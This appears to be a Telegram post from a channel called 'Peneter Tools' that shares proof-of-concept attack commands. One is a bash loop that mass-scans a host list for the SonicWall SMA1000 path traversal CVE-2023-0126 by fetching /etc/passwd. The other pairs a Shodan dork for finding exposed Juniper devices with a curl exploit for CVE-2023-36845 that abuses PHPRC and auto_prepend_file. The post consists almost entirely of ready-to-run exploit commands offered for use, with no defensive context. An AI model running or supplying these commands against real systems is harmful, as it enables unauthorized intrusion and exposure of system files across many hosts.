Peneter Tools – Telegram
CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC: 
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done
Juniper - Remote Code Execution ( CVE-2023-36845 )
Shodan Dork : noscript:"Juniper" http.favicon.hash:2141724739

Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'